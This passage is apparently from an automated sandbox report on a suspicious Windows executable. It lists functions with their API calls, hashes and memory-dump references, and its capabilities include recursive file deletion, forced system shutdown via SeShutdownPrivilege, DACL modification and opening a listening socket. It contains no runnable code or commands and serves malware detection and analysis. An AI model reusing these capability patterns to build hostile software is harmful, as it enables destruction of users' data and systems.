                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FolderPath$LocalTime__swprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %.3d
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3337348382-986655627
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044BF8B Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 92fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BFC5
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0044BFEF
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044C004
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0044C030
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044C042
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044C054
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044C061
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044C075
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044C084
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044C093
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FileFind$_wcscat$Close$AttributesDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3771809977-1173974218
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ed66a4a5c2d47a5941d3310c8672dc2671f9469612d4f27da2b7748a55e83c30
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a80060c485f0c376bb4167ae0b00d0fca8fe69e194215be70a311f08e499f8fe
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed66a4a5c2d47a5941d3310c8672dc2671f9469612d4f27da2b7748a55e83c30
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B31C472409300AAC720DFA0DC84ADFB7DCAF99314F444E1EFA8982151EB38D24887A7
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00433414
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                                                                                                                                                                                                                                                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2938487562-3733053543
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                                                                                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                                                                                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1255039815-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00433073
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00433085
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                                                                                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1158019794-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                                                                                                                                                                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                                                                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                                                                                                                                                                                                                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                                                                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
